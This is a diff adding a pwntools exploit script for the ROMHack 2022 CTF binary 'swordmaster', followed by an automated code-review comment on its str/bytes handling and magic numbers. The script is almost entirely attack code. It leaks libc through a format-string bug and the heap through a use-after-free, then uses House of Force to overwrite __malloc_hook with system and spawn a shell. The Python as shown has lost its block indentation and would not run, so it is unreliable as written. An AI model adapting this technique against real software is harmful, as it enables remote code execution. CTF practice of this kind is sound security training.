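--- a/CTFs/ROMHack2022/swordmaster/exploit.py
+++ b/CTFs/ROMHack2022/swordmaster/exploit.py
@@ -0,0 +1,66 @@
+from pwn import *
+import sys
+if not sys.warnoptions:
+import warnings
+warnings.simplefilter("ignore")
+
+elf = ELF("./swordmaster")
+libc = ELF("./glibc/libc.so.6")
+p = elf.process(['./glibc/ld-linux-x86-64.so.2','./swordmaster'],env={"LD\_PRELOAD":"./glibc/libc.so.6"})
+
+# ---- SET NAME ----
+p.sendline('/bin/sh\0')
+
+# ---- LEAK LIBC BASE WITH FORMAT STRING BUG ----
+p.recvuntil(b'>> ')
+p.sendline(b'%13$p')
+p.recvuntil('There is no ')
+
+libc_leak = p.recvline().split(b' ')[0]
+libc_leak = int(libc_leak[2:], 16)
+libc.address = libc_leak - 0x21c87
+
+log.info("LEAKED LIBC BASE: " + hex(libc.address))
+
+
+# ---- LEAK HEAP BASE WITH UAF BUG -------
+p.recvuntil(b'>> ')
+p.sendline(b'5')
+p.recvuntil(b'>> ')
+p.sendline(b'3')
+p.recvuntil(b'Class: ')
+
+heap = p.recvline()[:-1]
+heap = int.from_bytes(heap, 'little') - 4800 - 0x10
+
+log.info("LEAKED HEAP BASE: " + str(hex(heap)))
+
+def malloc(size, data):
+p.recvuntil(b'>> ')
+p.sendline(b'1')
+p.recvuntil(b'>> ')
+p.sendline(str(size))
+p.recvuntil(b'>> ')
+p.sendline(data)
+
+
+
+# ---- House Of Force Set-Up ----
+malloc(40, b'\x41'*47)
+
+# ---- Point top chunk to __malloc_hook ----
+distance = libc.sym.__malloc_hook - (heap + 0x1330) - 0x10
+malloc(distance, 'dummy')
+
+# ---- Overwrite __malloc_hook with system ----
+malloc(24, p64(libc.sym.system))
+
+# ---- Point cmd at our name (/bin/sh) and call malloc to execute our overwritten hook ----
+cmd = heap + 0x1270
+p.recvuntil(b'>> ')
+p.sendline(b'1')
+p.recvuntil(b'>> ')
+p.sendline(str(cmd))
+
+p.interactive()
+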
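Review bot: The pwntools I/O calls mix `str` and `bytes` — `p.sendline('/bin/sh\0')`, `p.recvuntil('There is no ')`, `p.sendline(str(size))` inside `malloc`, `malloc(distance, 'dummy')` and `p.sendline(str(cmd))` — and the `warnings.simplefilter("ignore")` block at the top of the file hides exactly the BytesWarning pwntools emits for that, so on a pwntools release that rejects `str` arguments the script stops without any explanation. Use bytes throughout, e.g. `p.sendline(b'/bin/sh\0')`, `p.recvuntil(b'There is no ')`, `p.sendline(str(size).encode())`, and drop the blanket warning filter so real problems stay visible. The libc leak parse `int(libc_leak[2:], 16)` assumes a `0x` prefix and silently mis-parses anything else, whereas `int(libc_leak, 16)` accepts the prefix directly and raises a clear ValueError when the line is not what was expected. The constants 0x21c87, 4800, 0x1330 and 0x1270 are bare magic numbers; a comment on each naming what it is an offset from and which libc build it was measured against would make the script reproducible, and `malloc` needs a one-line docstring stating which menu option it drives and what `size` and `data` are sent as.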